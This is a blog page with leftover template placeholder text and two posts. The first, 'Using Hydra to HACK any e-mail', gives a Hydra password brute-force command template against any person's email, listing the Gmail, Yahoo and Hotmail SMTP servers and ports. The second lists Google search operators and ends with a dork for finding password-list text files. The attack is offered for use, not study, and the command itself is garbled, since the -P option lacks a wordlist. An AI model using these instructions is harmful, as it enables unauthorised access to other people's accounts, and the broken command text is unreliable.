This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Using Hydra to HACK any e-mail




Type hydra in kali terminal or in terminal in other linux operating systems whereever hydra is installed. After you enter hydra and click on enter, you can find information on how to use hydra. As per this post I will show you command to hack into any email.

hydra -l < mail address> -P -s < port > -S -v -V -t < number of tasks> < mailer server > smtp

Below are port numbers and server links.

Yahoo
Server SMTP.mail.Yahoo.com
Port 465


Gmail
Server smtp.Gmail.com
Port 465


Hotmail
Server smtp. Live.com
Port 587

Advanced way of searching in GOOGLE

OperatorHow to Use ItExamples
* (Asterisk)Add the asterisk as a placeholder for an unknown word or factFind quotes that start with "Life is like": Life is like a *
" (Quotation marks)Look for an exact word or phrase by putting it in quotesFind pages that talk about the book One Hundred Years of Solitude: "One Hundred Years of Solitude"
- (Hyphen)Use a hyphen before a word or site to exclude it from your search resultsOmit Wikipedia pages from search results: -site:wikipedia.org. Narrow results to the band R.E.M., not rapid eye movement: R.E.M. -sleep
.. (Two Periods)Separate numbers with two periods without spaces to search for numbers within that rangeFind phones that cost between $200 and $400: Android phone $200..$400. Find computer milestones that took place between 1950 and 2000: "computer milestones" 1950..2000
allintitle:Use allintext:[search phrase] to find pages with all of those words in the title of the pageShow pages that have both "Apple" and "notebook" in the title: allintitle:Apple notebook
allintext:Use allintext:[search phrase] to find pages with all of those words in the body of the pageShow pages that mention Roth, IRA, and investments in the body: allintext:Roth IRA investments
allinurl:Use allinurl:[search phrase] to find pages with all of those words in the URLShow pages that have both "Microsoft" and "Surface" in the URL: allinurl:Microsoft Surface
AROUND(n)Add AROUND(n) between two search terms to find pages where those terms are written on the page in close proximity. The number you choose in place of n sets the maximum distance between the terms. This is useful for finding relationships between two search terms.Find pages that mention Facebook and Microsoft in the same sentence or paragraph: Facebook AROUND(7) Microsoft
site:Use site:[URL] to limit search results to a specific websiteFind pages on Zapier that mention trello: site:zapier.com Trello
related:Use related:[URL] to find sites similar to a specific websiteFind websites similar to Zapier: related:zapier.com
filetype:Use filetype:[suffix] to limit results to a certain file format, such as PDF or DOC.Find keyboard shortcuts for Microsoft Office that are shared as PDF: filetype:pdf office keyboard shortcuts
intitle:Use intitle:[search phrase] to search for pages that have at least one of your search words in the titleShow pages that have "Apple" or "notebook" or both in the title: intitle:Apple notebook
intext:Use intext:[search phrase] to search for pages that have at least one of your search words in the body of the pageShow pages that mention Roth, IRA, and/or investments in the body: intext:Roth IRA investments
inurl:Use inurl:[search phrase] to search for pages that have at least one of your search words in the URLShow pages that mention Roth, IRA, and/or investments in the body: intext:Roth IRA investments
ORPerform two search queries at the same time by separating your search terms with OR. This will find pages that might one of several words.Search for pages that reference "Google Drive," "Dropbox," or "OneDrive": "Google Drive" OR Dropbox OR OneDrive

For example if we want to search some txt file or pdf in a website or relevant, we will type in google as

Within website with extension: inurl:"websitename.com" filetype:txt 

Relavent info with extension: intext:"passlist" filetype:txt